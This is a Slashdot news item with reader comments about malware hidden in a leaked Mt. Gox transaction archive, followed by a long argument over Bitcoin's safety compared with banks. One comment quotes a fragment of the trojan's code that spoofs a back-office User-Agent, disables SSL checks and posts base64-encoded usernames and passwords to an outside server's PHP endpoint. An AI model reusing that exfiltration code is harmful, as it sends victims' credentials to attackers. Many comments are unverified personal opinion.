Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Kaspersky: Mt. Gox Data Archive Contains Bitcoin-Stealing Malware

Unknown Lamer posted about 7 months ago | from the trusting-random-zip-files-considered-harmful dept.

Security 169

itwbennett writes "An archive containing transaction records from Mt. Gox that was released on the Internet last week also contains bitcoin-stealing malware for Windows and Mac, say researchers at Kaspersky Lab who have analyzed the 620MB file called MtGox2014Leak.zip. The files masquerade as Windows and Mac versions of a custom, back-office application for accessing the transaction database of Mt. Gox. However, they are actually malware programs designed to search and steal Bitcoin wallet files from computers, Kaspersky security researcher Sergey Lozhkin said Friday in a blog post."

Sorry! There are no comments related to the filter you selected.

Really? (3, Funny)

SternisheFan (2529412) | about 7 months ago | (#46512109)

Oh yes, I totally trust easily manipulated computer bits over paper money.

Re:Really? (4, Interesting)

Anonymous Coward | about 7 months ago | (#46512149)

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

Re:Really? (2)

SternisheFan (2529412) | about 7 months ago | (#46512201)

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency. Out of the gate, their track record sucks so far. Reliable? I'd trust my 3rd cousin Wilfred to pay me back first.

Re:Really? (1)

Anonymous Coward | about 7 months ago | (#46512233)

Well, except that none of the bitcoin "problems" or exploits have been with bitcoin itself. It's always some 3rd party poorly coded bullshit software (eg. exchanges, pools, online wallets, etc).

So far no one has managed to exploit bitcoin itself.

Re:Really? (3, Interesting)

SternisheFan (2529412) | about 7 months ago | (#46512285)

Does it really matter 'how' it happened? People are out of money, big time money. Bitcoin has not proven itself to be a reliable way to store money. Blame whatever you wish to. It is not secure to place my money in. And now Bitcoin will have to overcome the "once burned, twice shy'' hurdle.

Re: Really? (1)

Anonymous Coward | about 7 months ago | (#46512421)

Bit coin is reliable. The shitty exchanges are not.
If you have someone access to your paper wallet then the effect would be the same.

Re: Really??? (2)

rmdingler (1955220) | about 7 months ago | (#46512553)

Mt Gox, thee top exchange for turning bitcoins into coin of the realm,

turned out to be a house of phosphorous cards,

and you don't see a red flag waving?

Was your retirement locked up in there and now you find yourself too poor to pay attention?

Re: Really? (2)

Gunboat_Diplomat (3390511) | about 7 months ago | (#46512711)

Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

Why compare to paper? If I have bitcoin stealing malware on my computer (and there is like 150 variants of that in the wild) it will get the bitcoin even if I keep my wallet offline and encrypted, because I have to access it sometime. But, it won't get my online banking money, because they use a challenge-response protocol. Very different.

Re: Really? (1)

Anonymous Coward | about 7 months ago | (#46513269)

There are an equal number of trojans and other malware designed specifically to steal money from people using online banking.

But still.. you are blaming the way the exchanges were run on bitcoin itself. That is as dumb as saying paper money is unsafe because people rob banks (which they do https://en.wikipedia.org/wiki/... [wikipedia.org] ).

Re: Really? (4, Insightful)

mlts (1038732) | about 7 months ago | (#46513251)

BitCoin exchanges are where banks were, pre-Great Depression. They go under, you lose your savings, period. It was only under FDR that bank losses were covered by the US government under FSLIC/FDIC/NCUA insurance.

The BitCoin protocol has not had any attacks. It has been exchanges that were poorly run or attacks on the computers/endpoints storing BitCoin wallets. The BitCoin core protocol has proven to be secure, although there is always concern about one single party reaching the magic 51% mark.

Re:Really? (2)

mysidia (191772) | about 7 months ago | (#46512429)

Bitcoin has not proven itself to be a reliable way to store money.

Neither have dollars..... you leave them lying around on your kitchen table, and someone can break in while you're away and steal them all.

Also... if you deposit them in an investment firm who is not FDIC insured, and they go bankrupt, you might lose them all, just like with Gox.

Plenty of people had their banking details stolen every day. Ever heard of ATM skimmers?

Re:Really? (-1, Flamebait)

ahabswhale (1189519) | about 7 months ago | (#46512529)

lol...are you actually trying to make the argument that dollars are just as unsafe as bitcoin? I just want clarification so I can determine whether you or this other idiot made the dumbest comment I've read on the internet all day.

Re:Really? (1)

mysidia (191772) | about 7 months ago | (#46512895)

lol...are you actually trying to make the argument that dollars are just as unsafe as bitcoin?

As unsafe against bitcoin against WHAT?

There are an infinite number of threats against both. Both have certain fragilities.

Therefore... there is no basis of comparison for safety, except when you identify what kinds of shocks or unusual events that you are most concerned about.

But they both seem to be pretty darn risky and likely to be stolen, when we are talking about possibilities of physical theft and certain kinds of digital theft....

Re:Really? (3, Insightful)

ahabswhale (1189519) | about 7 months ago | (#46512975)

lol...have you ever heard of FDIC? Consumer protections? None of these things apply to bicoin and never will. My bank can be vaporized out of existence and it wouldn't do shit to me.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46512563)


Neither have dollars..... you leave them lying around on your kitchen table, and someone can break in while you're away and steal them all.

Plenty of people had their banking details stolen every day.
Ever heard of ATM skimmers?

If it's on my table, I hope your shotgun is bigger than mine.

Bitcoin is not an insured bank, gone means gone with no legal recourse. Yes, skimmers exist. Credit card companies have far more protection against fraud. What is your 'pro Bitcoin' arguement again?

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46512703)

What is your 'pro Bitcoin' arguement again?

I use linux.

Re:Really? (1)

Thetawaves (1113619) | about 7 months ago | (#46512721)

Bitcoin theft is still theft. There is plenty of legal recourse.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46512983)

Bitcoin theft is still theft. There is plenty of legal recourse.

There are many people out of pocket that would like to know what their recourse is.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513055)

So you're not just making a copy of the bits and bytes?

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513119)

No, you're not. You're also modifying bits and bytes in the distributed ledger on all computers of Bitcoin network.

That's what it makes it different from piracy - if me pirating your favourite "Big Butt Mamas #17" made your legit copy unwatchable, it'd be theft.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513273)

Good luck getting a jury to believe that. The average Joe sees a photo on the screen of a piece of paper with a QR code on it, thinking that BitCoin is a modified paper currency. It wouldn't be hard for a defense attorney to say that it was as big a deal as a swindle in World of Warcraft where someone sold a blue item for a purple's price.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513305)

CBA to search for it, but a few months ago there already was a court case in USA against a conman who collected BTC from easy trusting marks and ran.

He tried to get out of court by playing the same "Bitcoin is no money, can't prosecute me, nyahnyahnyah!" card you propose, but got slapped down by the judge.

Re:Really? (1)

click2005 (921437) | about 7 months ago | (#46513295)

Bitcoin is not an insured bank, gone means gone with no legal recourse. Yes, skimmers exist. Credit card companies have far more protection against fraud. What is your 'pro Bitcoin' arguement again?

US Dollars are also not a bank or a credit card company so why are you trying to compare a form of currency to something its obviously not?

Re:Really? (5, Insightful)

QilessQi (2044624) | about 7 months ago | (#46512661)

And yet, people are able to go to credit card companies and banks, dispute the fraudulent transactions, and get the money back. Because our commerce systems have evolved to cope with the reality of fraud and, consequentially, the necessity of insuring deposits through mechanisms like FDIC.

Like it or not, the Mt.Gox fiasco demonstrates that Bitcoin is not yet ready to serve as a desirable system of currency for the masses. For all the talk about the transparency of the blockchain, no one has been able to restore those stolen coins to the hands of their rightful owners.

Maybe someday people will be able to say, "thank God I used cryptocurrency for those transactions!". But that day is not today.

Re:Really? (-1)

Anonymous Coward | about 7 months ago | (#46513167)

>Neither have dollars..... you leave them lying around on your kitchen table, and someone can break in while you're away and steal them all.
But they have to take time to break into my house and find my money. With bitcoins, that's scriptable. One can deploy an attack against an astonishingly large number of people without the risk inherent in B&E in Alabama. Plus, no matter where you hide your bitcoin, the attack will find them when you try to access them. If I hide my cashwad under the litterbox, no one will find it.

Plus, there's teh shear IDIOCY of thinking I'd have a large amount of cash around. This is why bitcoin enthusiasts are fucking retarded. You honestly think that people want to keep money in a form that is somewhere between a massive PITA and impossible to use lying around. No. I keep my money in the bank and I use my CC and/or DC to access it.

>Plenty of people had their banking details stolen every day. Ever heard of ATM skimmers?
And when that happens, the bank restores your money. Because you've got a maximum liability limit for fraud. With BTC, you're truly fucked.

But yeah, continue telling how wonderful your crypto-pink sheet stock is.

Re:Really? (1)

Opportunist (166417) | about 7 months ago | (#46512601)

Actually, yes, it does matter. That's like saying "online banking is insecure" when in fact pretty much all exploits on online banking (at least in Europe) worked only due to negligence on the user's side. I know of not a single case where it was actually the bank's fault. And trust me, there are FAR, FAR more cases than you'll ever hear about (banks tend to pay, i.e. take over the cost for the users' idiocy to hush it up).

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513313)

It matters, in the same way that it matters whether or not your bank hires actual security guards or a safe made of thick steel rather than plastic. If your bank kept your money in a very insecure vault and the money was then stolen you would blame the bank, not the currency. Bitcoin is no different.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513643)

What's the alternative? Fiat? Ask the Cypriots how secure that is!

Re:Really? (1)

Anonymous Coward | about 7 months ago | (#46513693)

Sure, let's. People with up to 100K EUR got it back, and those who had more, got 40% of their savings seized.

Now let's hear it for Bitcoin side. So, how much did all the MtGox users get refunded? How about all the other crashed Bitcoin "enterprises"?

I think about the only big case where third party properly refunded BTC investors was, ironically, ponzi.io.

Re:Really? (5, Insightful)

QilessQi (2044624) | about 7 months ago | (#46512607)

As I understand it, the Mt.Gox fiasco was due in part to a hacker's ability to exploit transaction malleability in Bitcoin. Yes, Gox should have updated their software, but the Bitcoin protocol had a known weakness in it, and we've seen the result. But let's leave that aside for a minute:

The real problem is that people have been able to exploit the Bitcoin ecosystem, which does not yet have the resilience to deal with the way human beings expect to be able to work with money.

If you want to create a currency for everyone, then that currency has to be simple and secure even for new adopters. Part of creating a good system (of any sort) is shielding users from serious consequences. If someone in another state charges $3000 to my credit card to buy pharmaceuticals, I'll get a call. If a legitimate vendor charges my card but fails to deliver the promised goods, Visa or MasterCard will give me my money back after one phone call and a followup letter. If my bank is robbed, my deposits are FDIC insured.

Bitcoin enthusiasts are describing exchanges as being "just like banks", and then blaming the users for treating them like banks and keeping their coins there. Instead of castigating folks for not solely printing their wallets out on computers that have been rebooted while disconnected from the Internet for that express purpose, maybe the Bitcoin community could take a step back and find a way to make the entire ecosystem more human-proof.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46512857)

Bitcoin is still the wild west of the internet and anybody who isn't ready for that should not venture out there and take those risks.

Easy security and other consumer friendly features like arbitrators who provide consumer protection via multi-signature transactions are coming. Right now there ain't no law in deadwood.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513123)

hm so good luck with getting people to wanna live there... there also ain't no gold in them thar hills anymore!!

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513319)

Transaction malleability does not allow you to magically steal coins. Blame the website that allowed a supposed cold wallet get drain automatically. There's not even any actual evidence that they were stolen in a hack. Karpeles could have just walked off with them.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513445)

What about 2008????

Re:Really? (2, Funny)

zieroh (307208) | about 7 months ago | (#46512391)

Real coin has worked for thousands of years.

Yeah. And over those thousands of years, real coins have proved impervious to all manner of theft.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46512937)

Of course real coins can be stolen. Which is why we don't keep large amounts of cash on hand. We deposit money in banks that are insured so that WHEN people steal money or lose it...which happens invariably, as you point out...depositors have some recourse aside from the cold comfort of knowing the miracle of the "free market" will eventually punish the thieves.

Re:Really? (2, Insightful)

mysidia (191772) | about 7 months ago | (#46512411)

Real coin has worked for thousands of years. Bitcoins are a new, totally unproven currency.

Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything. The fed and the banks just will "federal reserve" monopoly bucks into existence.

When you go to a store, and swipe your credit card.... you think those are "real coins" you are paying with??

NOPE! And I assure you, this mode of payment is not thousands of years old.

For every one of your dollars you put in the bank, your bank lent out 10 imaginary ones. Chances are you didn't even put in "real dollars though" ---- you received money through DD or "deposited a check" probably from an employer or customer corresponding to a "digital balance", that never had to be realized as real physical anything, because they were also most likely all paid by credit card, checo or DD.

Re:Really? (3, Informative)

sphealey (2855) | about 7 months ago | (#46512503)

- - - - - - NOPE! And I assure you, this mode of payment is not thousands of years old. - - - - - -

Another crytocoin fanatic who hasn't bothered to read a detailed history of money, much less a standard theory of money textbook. Hint: more than one ancient language has been deciphered by translating magic documents known as "letters of credit".

sPh

Re:Really? (3, Insightful)

mbkennel (97636) | about 7 months ago | (#46512533)

| Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

Other than the collective agreement and binding contracts by the most powerful governments and private individuals on Earth, and a deep market for liquid and tradable property as well as productive real property.

Fiat currency is not "by fiat" automatically exchangable for a certain quantity of a certain kind of property with no market fluctuation allowed. But that doesn't mean it's not 'backed' by anything.

Bitcoin isn't by fiat exchangable for anything either---it only has constructed scarcity.

| The fed and the banks just will "federal reserve" monopoly bucks into existence.

Not quite "at will" but in specific economic & financial circumstances deemed to be legal and essential parts of commerce & business.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46512885)

Anyone who says fiat currency is not backed by anything is an ignorant idiot and is to be ignored.

(Hint : Fiat is backed by the assets of a country)

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513335)

Better send that news over to the US federal reserve.

Re:Really? (2)

TubeSteak (669689) | about 7 months ago | (#46512969)

Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

And once we introduced central banking, fiat has worked out a lot better than "real coin" did before we abandoned it.
I've yet to hear a satisfactory response to the basic question of why we should go back to a deflationary currency like gold.
If you're feeling especially pugnacious, feel free to explain how we'd go about re-implementing [gold] while avoiding the problems of its past and fixing the actual (and perceived) problems of the present.

Re:Really? (1)

Chas (5144) | about 7 months ago | (#46513139)

Yet you can go to your bank any time and be guaranteed payout in real dollars.
And you have near-zero chance of being screwed over the way these people are by collapsing exchanges.
How likely is it that the US (and thus FDIC) are going to collapse tomorrow, or next week, or a year from now? Maybe there's a chance of it happening, but your chance of getting hit by lightning while simultaneously winning the lottery is better.
How likely is it that one or more of these exchanges is going to fold up and disappear with any funds you may have invested (dollars or BTC). Judging on recent trends, the probability is a HELL of a lot closer to One than it is to Zero.

BTC itself is a Ponzi scheme.
Exchanges are confidence scams.

Can people make money in both situations? SURE!
Just don't fool yourself as to what you're doing.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513359)

Except "real coin" isn't what we have --- we have fiat, which is no longer backed by anything.

If you think that's true, then you have no real understanding of fiat currency at all.

For every one of your dollars you put in the bank, your bank lent out 10 imaginary ones.

You obviously don't understand how banks work either.

you received money through DD or "deposited a check" probably from an employer or customer corresponding to a "digital balance", that never had to be realized as real physical anything

You most certainly don't understand how accounts work at all. Put simply, yes all that money does have a physical bill or coin somewhere.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513615)

Your third point is incorrect, there is quite a bit of currency floating around which has never had a bill or coin minted for it. The federal reserve guarantees banks an amount of money, and that money is transacted between banks as a result of everyday activity of customers. The reserve does guarantee that the funds can be minted at will, but the amount of actual currency in circulation is dwarfed by that which is just numbers on ledgers.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46512217)

Banks are properly regulated and insured, so no, a bank's customers would not lose money due to any digital shenanigans.

Re:Really? (4, Informative)

ttucker (2884057) | about 7 months ago | (#46512225)

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

Re:Really? (2)

bill_mcgonigle (4333) | about 7 months ago | (#46512333)

Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

The blockchain transactions aren't reversible, but neither are bank ledger transactions. At the customer service level, both can be refunded (even when it's a bad idea: see Mt. Gox). It's like like in USD's you're going to get the same bills back, but that's why currency is fungible.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513393)

The blockchain transactions aren't reversible, but neither are bank ledger transactions.

If you think that's actually a true statement, then I've got a Nigerian Prince who needs help getting his money to a safe country, and is going to send you a Cashier's Check for $1,000,000. Just deposit it into your account, then keep $100k for yourself and have your bank send a Cashier's Check for $900,000 to a bank in this other country.

Bank transactions not only CAN be reversed, they frequently are. But just in case you need a full explanation, here's what happens: The check you wrote gets cashed out in some country where they don't care about your country's laws, shortly after that the original check you received gets reversed because it's fraudulent. You can't get the $900,000 back because the bank in the country you sent it to gives your bank the finger, or is itself an empty "shell" company which doesn't exist... and you're the one stuck owing the $900,000 to YOUR bank in YOUR country.

Re:Really? (2)

mysidia (191772) | about 7 months ago | (#46512487)

no bitcoin transactions are ever reversible.

No cash transactions are ever reversible.

[And Bitcoin is a form of cash.]
There, fixed it for you.

Re:Really? (1)

CanHasDIY (1672858) | about 7 months ago | (#46513213)

No cash transactions are ever reversible.

They are if you keep the receipt.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513249)

Except the part that online bitcoin transactions are analogous to online or wire currency transactions not cash. online or wire transactions in most currencies are reversible or failing that covered by fraud protections or FDIC if proven fraudulent.

bitcoin transactions are analogous to cash transactions when printed out and physically handed to a person.

Re:Really? (3, Informative)

Kjella (173770) | about 7 months ago | (#46512505)

This is totally false. Almost all bank transactions are reversible in the case of fraud, no bitcoin transactions are ever reversible.

That's generally false [bbb.org] for wire transfers. Even if you don't do a wire transfer chances are they have some sort of money mule who'll wire the money to Nigeria and that's the last you'll see of them. The mule is of course a hobo or something with no assets to cease. In general if the receiving bank has accepted the money, it's gone. I see a few people saying you should be able to reverse one within 72 hours, but in practice I don't see anybody saying they've actually successfully reversed such a scam.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513223)

This is totally false. Almost all bank transactions are reversible in the case of fraud

A friend just lost $20,000 because of a fraudulent wire transfer. The bank says they have a signature and a copy of the ID, and so refuse to reverse it. Would it be OK if they contacted you so you could straighten them out?

Re:Really? (4, Insightful)

Ralph Wiggam (22354) | about 7 months ago | (#46512227)

How often does someone break into a bank vault? Almost never. When someone "robs a bank" they're just taking a couple thousand bucks from a teller drawer, which is negligible.

When someone steals real money from a bank, it is insured by the FDIC.

The impact is way, way worse with bitcoin.

Re:Really? (1)

DarkOx (621550) | about 7 months ago | (#46512393)

Except Mt.Gox was never a bank, if anything its more comparable to a broker, and if there was a major theft leading to your broker going bankrupt there would be no FDIC insurance for you. Any cash you had in your account -- gone, and security not settled and in your name gone. Unless the property was recovered some how by authorities.

Re:Really? (1)

wallsg (58203) | about 7 months ago | (#46512567)

Except Mt.Gox was never a bank, if anything its more comparable to a broker, and if there was a major theft leading to your broker going bankrupt there would be no FDIC insurance for you. Any cash you had in your account -- gone, and security not settled and in your name gone. Unless the property was recovered some how by authorities.

Incorrect. SIPC (Securities Investor Protection Corporation) insurance protects cash up to $250,000 and cash and securities up to $500,000 per account. Most brokerage firms carry additional insurance, usually called "excess SIPC coverage".

Mt. Gox was the tavern bookie that you left your winnings with, with no insurance or regulation at all.

Re:Really? (1)

wallsg (58203) | about 7 months ago | (#46512591)

And I totally agree with your signature calling for the repeal of the 17th Amendment.

Re:Really? (3, Informative)

mysidia (191772) | about 7 months ago | (#46512527)

When someone steals real money from a bank, it is insured by the FDIC.

Actually.... loss due to fraud, theft, or accounting errors, are the iconic examples of a bank loss that IS NOT FDIC covered.

FDIC insures the funds against the bank losing the money through the ordinary course of business (market risks -- such as the risk of borrowers defaulting on the loan, and the bank, therefore losing the principal required to cover their obligations to depositors).

WP has some other examples [wikipedia.org] of items not insured by the FDIC, also not covered:

Investments backed by the U.S. government, such as US Treasury securities

The contents of safe deposit boxes. -- Even though the word deposit appears in the name, under federal law a safe deposit box is not a deposit account – it is merely a secured storage space rented by an institution to a customer.
Losses due to theft or fraud at the institution. These situations are often covered by special insurance policies that banking institutions buy from private insurance companies.

Accounting errors. In these situations, there may be remedies for consumers under state contract law, the Uniform Commercial Code, and some federal regulations, depending on the type of transaction.

Insurance and annuity products, such as life, auto and homeowner's insurance.

Re:Really? (1)

Stormy Dragon (800799) | about 7 months ago | (#46512637)

For the most recent year in which statistics have been published (2011), 5,086 times, resulting in a loss of $38,343,501.96, only $8,070,886.97 was ever recovered.

http://www.fbi.gov/stats-servi... [fbi.gov]

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46512231)

The difference is, this has happened to a bigger swath of bitcoin than it ever could to a bank.

Re:Really? (1)

mysidia (191772) | about 7 months ago | (#46512535)

The difference is, this has happened to a bigger swath of bitcoin than it ever could to a bank.

Not if the 'bank' was as negligent as Mt.Gox was, and still managed to elude any regulators.

Re:Really? (1)

exomondo (1725132) | about 7 months ago | (#46512287)

...except this was no different from someone doing the same thing to a bank.

It's totally different! Unlike a normal bank bitcoin transactions are irreversible, untraceable and the deposits are uninsured, the whole thing is unregulated and anonymous by design.

Re:Really? (1)

beelsebob (529313) | about 7 months ago | (#46512547)

Right... because this happens so often with banks. We see a bank go pop, and everyone's money disappear every month or so, don't we.

And you know... the government doesn't insure money held in bank accounts. It's completely the same.

Re:Really? (1)

Stormy Dragon (800799) | about 7 months ago | (#46512669)

Between 2008 and 2012, 465 separate US banks failed:

http://en.wikipedia.org/wiki/L... [wikipedia.org]

Re:Really? (1)

aardvarkjoe (156801) | about 7 months ago | (#46512809)

And if you read the article you linked to, you'll realize that people's deposits didn't just disappear, even when the banks failed.

Not from the customer's point of view (3, Insightful)

Camael (1048726) | about 7 months ago | (#46513085)

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

Except that the current banking system has failsafes to protect the depositor, even if the bank is at risk. For those who still use it, bank books and pass books record how much is in your bank account. Ditto for the monthly statements sent to depositors who have an electronic account, which is a hard copy in your hand. In many jurisdictions, these are legal evidence of a debt owed by the bank to you. Most banks are insured, both privately and by their respective governments.

If you are just a normal depositor stashing your cash in a bank account, you are much more likely to recover something in the event a bank is (electronically) robbed. Take for example the relatively recent collapse of Barings Bank [numa.com] - according to the Bank Of England Report on the Collapse of Barings, the interests of depositors and creditors were still protected although the bank was closed. Compare this with the uncertain fate of the Bitcoin depositors of Mt. Gox which just recently filed for bankruptcy.

The truth is that depositing funds in Bitcoins right now involves taking a substantial risk which is much higher than putting it into the current banking system. Deluding uninformed investors that investing in Bitcoins is "no different" from putting it in a bank is untrue and is likely to greatly harm the Bitcoin cause once these investors are burnt.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513227)

If it were that easy to rob a bank, I would't trust banks either.

Re:Really? (0)

Anonymous Coward | about 7 months ago | (#46513297)

...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

Right, because when I request a copy of my transaction data from my bank, it comes with malware implanted in the paper.

Re:Really? (1)

Kris_J (10111) | about 7 months ago | (#46512545)

  • These are not "easily manipulated", they are cryptographically secure.
  • There is zero counterfeit bitcoin. You can't say the same about paper currency.
  • This isn't about the security of bitcoin, it's about phishing and trojans.

Different forms, same effect (2)

Camael (1048726) | about 7 months ago | (#46513271)

There is zero counterfeit bitcoin. You can't say the same about paper currency.

Technically correct, since bitcoin does not exist in physical form and therefore cannot be counterfeited in physical form.

But can transactions involving bitcoins be counterfeited? Most certainly! [arstechnica.com]

Mt. Gox, Bitstamp, and other Bitcoin exchanges have temporarily suspended withdrawal transactions after coming under a form of a denial-of-service attack that abuses weaknesses in the way they keep track of fund balances, a security expert said.

Andreas M. Antonopoulos, chief security officer of digital wallet developer Blockchain, said the attacks work by flooding exchanges with a large number of malformed transactions that are similar, but not identical, to legitimate transactions that were already made. Exchanges that trust one or more of the fake records instead of the entries in the official Bitcoin blockchain quickly fall out of sync with the rest of the network and must recalculate their fund balances once the mistakes become apparent.

The net effect is the same. Counterfeit paper currency deprives its holders of the value of that currency. Counterfeit bitcoin transactions deprive the owners of the bitcoins involved in that transaction of the value of those bitcoins.

Re:Different forms, same effect (0)

Anonymous Coward | about 7 months ago | (#46513355)

Incorrect.

"Counterfeit transactions" can't just get free money out of someone - they can confuse some BTC clients into thinking that transaction failed (reference implementation doesn't, IIRC). Making them repeat the transaction is separate step.

Think someone telling you that check you sent got lost in the mail (and you just trusting and writing a new one).

PS: MtGox's story sounds like a pile of bullcrap and/or giant incompetency in this regard. Either, not very believable and "That's typical PHP programmer for you!" worthy, their software was automatically resending failed transactions (instead of, you know, *failing* and reporting the fail), nobody audited the logs and nobody did financial audits until they lost an equivalent of half a billion dollars. Or worse, and even less believable - their techsupport resent those transactions and didn't even bat an eyelash until they lost 700kBTC.

Re:Really? (1)

Anonymous Coward | about 7 months ago | (#46512777)

You think the money in your bank account is paper, and not easily manipulated computer bits? That's so cute.

Re:Really? (0)

ThatsMyNick (2004126) | about 7 months ago | (#46512831)

Keep a paper bitcoin wallet. It as simple as that.

This just gets better and better (2)

VTBlue (600055) | about 7 months ago | (#46512113)

This becoming comical to the point of absurdity.

Slowpoking hard, aren't we? (3, Insightful)

gustgr (695173) | about 7 months ago | (#46512115)

This was known minutes after the leak was released. You disappoint me, slashdot.

Re:Slowpoking hard, aren't we? (1)

gustgr (695173) | about 7 months ago | (#46512151)

Also, the MtGox2014Leak.zip file is 750672322 bytes. The trades.zip file is 622555932 bytes.

Re:Slowpoking hard, aren't we? (0)

Anonymous Coward | about 7 months ago | (#46512177)

Sorry, this news story would have made it to the front page faster if it would have involved Tesla Motors or Google Glass.
 
-The Slashdot Team

Leak (5, Informative)

gustgr (695173) | about 7 months ago | (#46512125)

The leak is real, nonetheless. I found my balance and transactions there.

Re:Leak (2)

WinstonWolfIT (1550079) | about 7 months ago | (#46512673)

The data is publicly available.

Re:Leak (2)

Kjella (173770) | about 7 months ago | (#46512863)

Of course, just like repacked cracks usually do provide you with working software - and a trojan/malware infection. Why would you want to fight negative comments and complaints that it's fake when you can deliver and turn your victims into willing advocates and distributors?

Re:Leak (1)

gustgr (695173) | about 7 months ago | (#46513413)

The thing is, you don't need that .exe to access the leaked data. The leaks are just a bunch of csv files. I never run the .exe.

Old news. (3, Informative)

Janek Kozicki (722688) | about 7 months ago | (#46512161)

Coindesk already wrote about that [coindesk.com] almost two weeks ago!

Re:Old news. (2)

rmdingler (1955220) | about 7 months ago | (#46512615)

We're like the Supreme Court here, Janek.

If you make your way successfully through district and appeals, we might be willing to hear and comment on your case.

Re:Old news. (0)

Anonymous Coward | about 7 months ago | (#46513351)

Old news indeed. Mr. Sergey Lozhkin should have checked reddit [reddit.com] ...

Censored content revealed (1)

boulat (216724) | about 7 months ago | (#46512181)

Looks like someone posted code that shows the censored IP http://pastebin.com/w2EWMp35 [pastebin.com]

Re:Censored content revealed (2)

mythosaz (572040) | about 7 months ago | (#46512235)

I'm mostly amused by the User-Agent:


      set the httpHeaders to "User-Agent: MtGoxBackOffice v0.1.2"
      libURLSetSSLVerification false
      post base64Encode("action=login&user="&field "l"&"&pass="&keyBuff&return) to "http://82.118.242.145/admin/tibanne-admin.php"

Re:Censored content revealed (0)

Anonymous Coward | about 7 months ago | (#46513353)

Anyone know what language that code is?

Re:Censored content revealed (0)

Anonymous Coward | about 7 months ago | (#46513381)

LiveCode. From the week old reddit thread linked elsewhere on this page:

Nope. I read source code directly from memory. LiveCode stores this encrypted and compressed in the executable. So I traced it until it was unencrypted and uncompressed and then simply copied and pasted.

Ultimately, Bitcoin was... (0)

Anonymous Coward | about 7 months ago | (#46512219)

...a government plot to concentrate dark money into preferred hands.

Tattoo spots the LOST MISSING SKYHACKED plane (0)

Anonymous Coward | about 7 months ago | (#46512577)

And he says,
Da plane!
Da plane!

Re:Tattoo spots the LOST MISSING SKYHACKED plane (0)

Anonymous Coward | about 7 months ago | (#46513513)

lol +1. you're still a retarded nigger:)

No Linux version (0)

Anonymous Coward | about 7 months ago | (#46512933)

You can keep trying to suggest Linux is sufficiently mainstream by now, but if even the ultimate in geekness, an exchange for Bitcoins, didn't bother developing a Linux version of the malware for stealing biocoins, then you know that Linux is not even given credit by the geek community. Stop wasting your life trying to convert to Linux and go back to Windows; at least you know it has a future.

no web depository or vault is safe as long as its (0)

Anonymous Coward | about 7 months ago | (#46512991)

no web depository or vault is safe as long as its up to one gatekeeper to allow withdrawals - mt gox has historically been very slow to allow withdrawals - one year ago and more, many many complaints from mt gox members regarding inability to withdraw funds - karpeles always had excuses even back then and that is bitcoin's fatal flaw.

This kind of thing is why I got rid of my Bitcoins (1)

Bryan Ischo (893) | about 7 months ago | (#46513155)

Almost every aspect of Bitcoin is just seeping with get rich quick scammers, schemers, and thieves and just general disgusting lowlifes. Whatever money I might have made by holding onto my bitcoins, it was worth to lose just to get out of Bitcoin and not have to associate myself with that den of scum and villianry anymore.

Re:This kind of thing is why I got rid of my Bitco (0)

Anonymous Coward | about 7 months ago | (#46513195)

Ah, so you've finally become a Buddhist and renounced all material possessions and currencies.

Re:This kind of thing is why I got rid of my Bitco (1)

Neo-Rio-101 (700494) | about 7 months ago | (#46513219)

You'll find the same with the forex market and other dodgy investment schemes.

Trading and investing is basically a game of "who is the better legal scammer".
At it's core, it's a game with it's own rules and dirty (but legal) tricks and unsportsmanlike behavior.

Re:This kind of thing is why I got rid of my Bitco (0)

Anonymous Coward | about 7 months ago | (#46513377)

After these recent heists about 7% or more of all bitcoin ever mined is controlled by thieves.

Am I the only one laughing? (0)

Anonymous Coward | about 7 months ago | (#46513487)

Bitcoin was obviously scamtastic and doomed from the start.

Re:Am I the only one laughing? (0)

Anonymous Coward | about 7 months ago | (#46513561)

Son, I ain't laughing. I held some 2900+ Bitcoin in '09. It was worth less than one hundred dollars, TOTAL. I got out way early. Goddamnit

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?